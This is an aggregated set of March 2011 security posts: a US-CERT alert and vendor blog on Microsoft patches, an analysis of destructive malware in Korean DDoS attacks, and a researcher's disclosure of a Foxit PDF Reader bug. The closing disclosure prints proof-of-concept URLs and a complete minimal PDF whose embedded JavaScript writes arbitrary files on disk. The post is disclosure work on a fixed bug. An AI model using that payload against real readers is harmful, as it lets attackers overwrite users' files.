TA11-067A: Microsoft Updates for Multiple Vulnerabilities

Original release date: March 08, 2011
Last revised: —
Source: US-CERT

Systems Affected
Microsoft WindowsMicrosoft Office

Overview
There are multiple vulnerabilities in Microsoft Windows and Microsoft Office.
Microsoft has released updates…

Original release date: March 08, 2011
Last revised: --
Source: US-CERT

Systems Affected

  • Microsoft Windows
  • Microsoft Office

Overview

There are multiple vulnerabilities in Microsoft Windows and Microsoft Office. Microsoft has released updates to address these vulnerabilities.


I. Description

The Microsoft Security Bulletin Summary for March 2011 describes multiple vulnerabilities in Microsoft Windows and Microsoft Office. Microsoft has released updates to address the vulnerabilities.


II. Impact

A remote, unauthenticated attacker could execute arbitrary code, cause a denial of service, or gain unauthorized access to your files or system.


III. Solution

Apply updates

Microsoft has provided updates for these vulnerabilities in the Microsoft Security Bulletin Summary for March 2011. That bulletin describes any known issues related to the updates. Administrators are encouraged to note these issues and test for any potentially adverse effects. In addition, administrators should consider using an automated update distribution system such as Windows Server Update Services (WSUS).


IV. References



Feedback can be directed to US-CERT.


Produced 2011 by US-CERT, a government organization. Terms of use


Revision History

March 08, 2011: Initial release

Microsoft Patch Tuesday – March 2011

Hello and welcome to this month’s blog on the Microsoft patch release. This is a quiet month —the vendor is releasing three bulletins covering a total of four vulnerabilities. Only one of the issues is rated ‘Critical’ and it af…

Hello and welcome to this month’s blog on the Microsoft patch release. This is a quiet month —the vendor is releasing three bulletins covering a total of four vulnerabilities. Only one of the issues is rated ‘Critical’ and it affects Media Player and Media Center. The remaining issues, affecting DirectShow, Groove, and Remote Desktop Client, are rated ‘Important’, and are all due to how the applications load Dynamic Linked Library (DLL) files. As always, customers are advised to follow these security best practices:

- Install vendor patches as soon as they are available.

- Run all software with the least privileges required while still maintaining functionality.

- Avoid handling files from unknown or questionable sources.

- Never visit sites of unknown or questionable integrity.

- Block external access at the network perimeter to all key systems unless specific access is required.

Microsoft’s summary of the March releases can be found here: http://www.microsoft.com/technet/security/bulletin/ms11-mar.mspx

The following is a breakdown of the issues being addressed this month:

1. MS11-015 Vulnerabilities in Windows Media Could Allow Remote Code Execution (2510030)

CVE-2011-0032 (BID 46682) Microsoft DirectShow DLL Loading Arbitrary Code Execution Vulnerability (MS Rating: Important / Symantec Rating: 8.5/10)

A remote code-execution vulnerability affects DirectShow due to how it loads DLL files. An attacker can exploit this issue by tricking an unsuspecting victim into opening a ‘.wtv’, ‘.drv-ms’, or ‘.mpg’ file from a remote network share. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the currently logged-in user.

Affects: Windows Vista SP1, Windows Vista SP2, Windows Vista x64 Edition SP1, Windows Vista x64 Edition SP2, Windows 7 for 32-bit Systems, Windows 7 for 32-bit Systems SP1, Windows 7 for x64-based Systems, Windows 7 for x64-based Systems SP1, Windows Server 2008 R2 for x64-based Systems, Windows Server 2008 R2 for x64-based Systems SP1, and Windows Media Center TV Pack for Windows Vista 32-bit and 64-bit editions

CVE-2011-0042 (BID 46680) Microsoft Windows Media Player/Windows Media Center '.dvr-ms' File Code Execution Vulnerability (MS Rating: Critical / Symantec Rating: 7.1/10)

A remote code-execution vulnerability affects Media Player and Media Center due to how they handle ‘DVR-MS’ files. An attacker can exploit this issue by tricking an unsuspecting victim into opening a malicious file. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the currently logged-in user.

Affects: Windows XP Media Center Edition 2005 SP3, Windows XP SP3, Windows XP Professional x64 Edition SP2, Windows Vista SP1, Windows Vista SP2, Windows Vista x64 Edition SP1, Windows Vista x64 Edition SP2, Windows 7 for 32-bit Systems, Windows 7 for 32-bit Systems SP1, Windows 7 for x64-based Systems, Windows 7 for x64-based Systems SP1, and Windows Media Center TV Pack for Windows Vista 32-bit and 64-bit editions

2. MS11-016 Microsoft Groove 2007 'mso.dll' DLL Loading Arbitrary Code Execution Vulnerability (2494047)

CVE-2010-3146 (BID 42695) Microsoft Groove Insecure Library Loading Vulnerability (MS Rating: Important / Symantec Rating: 8.5/10)

A previously public (Aug. 25, 2010) remote code-execution vulnerability affects Groove due to how it loads DLL files. An attacker can exploit this issue by tricking an unsuspecting victim into opening a ‘.vcg’ or ‘.gta’ file from a remote network share. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the currently logged-in user.

Affects: Office Groove 2007 SP2

3. MS11-017 Vulnerability in Remote Desktop Client Could Allow Remote Code Execution (2508062)

CVE-2011-0029 (BID 46678) Microsoft Remote Desktop Connection Client DLL Loading Arbitrary Code Execution Vulnerability (MS Rating: Important / Symantec Rating: 8.5/10)

A remote code-execution vulnerability affects Remote Desktop Client due to how it loads DLL files. An attacker can exploit this issue by tricking an unsuspecting victim into opening a ‘.rdp’ file from a remote network share. A successful exploit will result in the execution of arbitrary attacker-supplied code in the context of the currently logged-in user.

Affects: Remote Desktop Connection 5.2, 6.0, 6.1, and 7.0

More information on the vulnerabilities being addressed this month is available at Symantec’s free SecurityFocus portal and to our customers through the DeepSight Threat Management System.

Malware in Recent Korean DDoS Attacks Destroys Systems

There has been quite a bit of news recently about distributed denial of services (DDoS) attacks against a number of South Korean websites. About 40 sites– including the Presidential, National Intelligence Service, Foreign Ministry, Defense Ministry, and the National Assembly–were targeted over the weekend, beginning around March 4 at 10 a.m. Korean time. These assaults Read more…

There has been quite a bit of news recently about distributed denial of services (DDoS) attacks against a number of South Korean websites. About 40 sites– including the Presidential, National Intelligence Service, Foreign Ministry, Defense Ministry, and the National Assembly–were targeted over the weekend, beginning around March 4 at 10 a.m. Korean time. These assaults are similar to those launched in 2009 against sites in South Korea and the United States and although there is no direct evidence connecting them so far, they do bear some similarities.

DDoS attacks have occurred with more and more frequency, but one of the things that makes this attack stand out is its use of destructive payloads. Our analysis of the code used in the attack shows that when a specific timezone is noted by the malware it destroys the infected computer’s master boot record. If you want to destroy all the data on a computer and potentially render it unusable, that is how you would do it.

The malware in the Korean attacks employs an unusual command and control (C&C) structure. Instead of receiving commands directly from its C&C servers, the malware contacts two layers of servers. The first layer of C&C servers is encoded in a configuration file that can be updated at will by the botnet owner. These C&C servers simply provide a list of servers in the second layer, which will provide additional instructions. Looking at the disbursement of the first-layer C&Cs gives us valuable insight into the malware’s global footprint. Disbursement across this many countries increases resilience to takedowns. (Click on chart for details.)

This is further supported because the list of first-layer servers can be updated at any time.

The red code blocks deal with contacting the first-layer C&C server, the green code blocks retrieve the list of the second-layer servers, and the blue code blocks handle file downloads from the second-layer servers.

Botnets of infected computers usually receive commands directly and carry out the nefarious intent of their controllers. In this case, however, the C&C application behaves more like a downloader. Instead of directly interpreting commands, the application simply downloads files to the local hard disk. Secondary malware components that run independently of the main service find these files and then evaluate their contents to carry out an attack.

The two layers make it harder to analyze the malware because an analyst must understand many components and cannot simply follow the code flow within one malware binary. However, forensics are easier because in postmortem we can identify which task files have been created on an infected computer.

The malware in its current incarnation was deployed with two major payloads:

  • DDoS against chosen servers
  • Self-destruction of the infected computer

Although the DDoS payload has already been reported elsewhere, the self-destruction we discussed earlier in this post is the more pressing issue.

When being installed on a new computer, the malware records the current time stamp in the file noise03.dat, which contains the amount of days this computer is given to live. When this time is exceeded, the malware will:

  • Overwrite the first sectors of all physical drives with zeroes
  • Enumerate all files on hard disk drives and then overwrite files with specific extensions with zeroes

The service checks for task files that can increase the time this computer is allowed to live, so the botmaster can keep the botnet alive as long as needed. However, the number of days is limited to 10. Thus any infected computer will be rendered unbootable and data will be destroyed at most 10 days after infection! To protect against tampering, the malware will also destroy all data when the system time is set before the infection date.

The list of file extensions that will be overwritten is particularly interesting. It contains typical document data:

  • doc, docx, docm
  • xls, xlsx
  • pdf, eml (Outlook Email)

The list also contains some programming-language file extensions, such as c, cpp, h, and java. Wonder what they thought would be on the infected machines? Or did they already know?

One thing is clear: This is a serious piece of malware. It uses resilience techniques to avoid a takedown and even has destructive capabilities in its payload. This year is quickly shaping up to be a period of serious attacks and escalations on the cyberfrontier.

UPDATE

Our standalone malware-removal tool Stinger has been updated with a more generic detection of the malware involved in this attack. Stinger is available for download here.

Dangerous file write bug in Foxit PDF Reader

This is fixed in the recently released Foxit PDF Reader v4.3.1.0218. That release is marked as an important security update, although this file bug is not mentioned.Recently, I’ve been playing around with the various JavaScript APIs available in variou…

This is fixed in the recently released Foxit PDF Reader v4.3.1.0218. That release is marked as an important security update, although this file bug is not mentioned.

Recently, I've been playing around with the various JavaScript APIs available in various different PDF readers. In case you wanted to do the same, I made some little tools, including a simple one to execute PDF-based JS via an URL:

https://cevans-app.appspot.com/static/pdfjs.html?js=app.alert('hi')

The serious bug I found in Foxit PDF Reader permits arbitrary files to be written with arbitrary content, like this:

https://cevans-app.appspot.com/static/pdfjs.html?js=createDataObject('c:/autoexec.bat','echo hi mom')

Files can be overwritten as well as created.

I did some hackery on the generated PDF and managed to squeeze a full valid PDF, including simple JS payload, into 136 characters. This means I can tweet the full PoC PDF, which I will do shortly :) Here it is for completeness:

%PDF 1 0 obj<</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj<</S /JavaScript /JS (createDataObject\('c:/pwn','pwn'\))>> trailer<</Root 1 0 R>>